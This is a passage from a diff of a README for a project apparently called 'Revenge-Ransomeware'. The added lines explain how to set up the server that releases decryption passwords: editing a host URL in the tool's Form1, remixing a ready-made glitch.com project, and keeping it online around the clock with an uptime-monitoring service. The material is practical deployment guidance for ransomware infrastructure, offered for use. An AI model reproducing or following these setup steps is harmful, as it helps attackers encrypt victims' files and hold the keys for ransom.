Bowlingtoolkit/Revenge-Ransomeware/README.md

 });

 ```
+<br>For the website for decrypting files you need to modify Form1: `string host = "website url, glitch can be used, express app example in readme";` this part and put the url exemple: `https://nameofyourproject.glitch.me`<br>
 - You can use [glitch.com](https://glitch.com) to create projects to get the decrypt password, if you want fresh project [clickhere](https://glitch.com/edit/#!/remix/revenge-ransome), but make sure to make the project 24/7 by using service like uptimerobot.